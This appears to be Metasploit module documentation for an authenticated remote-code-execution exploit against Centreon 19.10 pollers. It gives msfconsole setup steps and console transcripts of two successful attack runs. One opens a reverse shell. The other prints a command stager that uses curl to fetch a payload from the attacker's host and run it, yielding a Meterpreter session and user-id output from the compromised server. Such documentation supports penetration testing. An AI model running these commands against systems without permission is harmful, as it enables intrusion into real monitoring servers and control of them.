## Vulnerable Application

Centreon is an open source IT monitoring solution by Centreon, a leading Paris-based software company.

An authenticated user with sufficient administrative rights to manage pollers can use this functionality to
execute arbitrary commands remotely. Usually, the miscellaneous commands are used by the additional modules
(to perform certain actions), by the scheduler for data processing, etc.

This module uses this functionality to obtain a remote shell on the target.

Tested on:

 * [Centreon 19.10.8](http://vm.download.centreon.com/centreon-vbox-vm-19_10-3.el7.ovf.zip)
 * [Centreon 19.10.5](http://vm.download.centreon.com/centreon-vbox-vm-19_10-1.el7.ovf.zip)

## Verification Steps

 1. Install the module as usual
 2. Start msfconsole
 3. Do: `use exploit/linux/http/centreon_pollers_auth_rce`
 4. Do: `set RHOSTS [IP]`
 5. Do: `set LHOST [IP]`
 6. Do: `set USERNAME [USERNAME]`
 7. Do: `sat PASSWORD [PASSWORD]`
 8. Do: `set VERBOSE true`
 9. Do: `run`

## Scenarios

```
msf5 > use exploit/linux/http/centreon_pollers_auth_rce
msf5 exploit(linux/http/centreon_pollers_auth_rce) > set rhosts [IP]
rhosts => [IP]
msf5 exploit(linux/http/centreon_pollers_auth_rce) > set username admin
username => admin
msf5 exploit(linux/http/centreon_pollers_auth_rce) > set password centreon
password => centreon
msf5 exploit(linux/http/centreon_pollers_auth_rce) > set lhost [IP]
lhost => [IP]
msf5 exploit(linux/http/centreon_pollers_auth_rce) > set verbose true
verbose => true
msf5 exploit(linux/http/centreon_pollers_auth_rce) > run

[*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444
[*] Send authentication request.
[*] Successful authenticated.
[*] Upload command payload on the target.
[*] Create new poller entry on the target.
[*] Reload the poller to trigger exploitation.
[*]  -- Generating files.
[*]  -- Restarting engine.
[*]  -- Executing command.
[*] Command shell session 1 opened (XXX.XXX.XXX.XXX:4444 -> XXX.XXX.XXX.XXX:59624) at 2020-02-03 17:41:13 +0400

id
uid=48(apache) gid=48(apache) groups=48(apache),993(centreon-engine),994(centreon-broker),998(centreon),999(nagios)

  --or--

msf5 exploit(linux/http/centreon_pollers_auth_rce) > set target 1
target => 1
msf5 exploit(linux/http/centreon_pollers_auth_rce) > run

[*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444
[*] Send authentication request.
[*] Successful authenticated.
[*] Using URL: http://0.0.0.0:8080/fNqJS82wB
[*] Local IP: http://XXX.XXX.XXX.XXX:8080/fNqJS82wB
[*] Generated command stager: ["curl -so /tmp/MBoYQsJv http://XXX.XXX.XXX.XXX:8080/fNqJS82wB;chmod +x /tmp/MBoYQsJv;/tmp/MBoYQsJv;rm -f /tmp/MBoYQsJv"]
[*] Upload command payload on the target.
[*] Create new poller entry on the target.
[*] Reload the poller to trigger exploitation.
[*]  -- Generating files.
[*]  -- Restarting engine.
[*]  -- Executing command.
[*] Client XXX.XXX.XXX.XXX (curl/7.29.0) requested /fNqJS82wB
[*] Sending payload to XXX.XXX.XXX.XXX (curl/7.29.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to XXX.XXX.XXX.XXX
[*] Meterpreter session 2 opened (XXX.XXX.XXX.XXX:4444 -> XXX.XXX.XXX.XXX:60536) at 2020-02-03 17:44:47 +0400
[*] Server stopped.

meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter >
```

## Targets

```
Id  Name
--  ----
0   Reverse shell (In-Memory)
1   Meterpreter (Dropper)
```

## References

1. <https://www.exploit-db.com/exploits/47969>
2. <https://www.exploit-db.com/exploits/47977>
3. <https://www.exploit-db.com/exploits/47978>
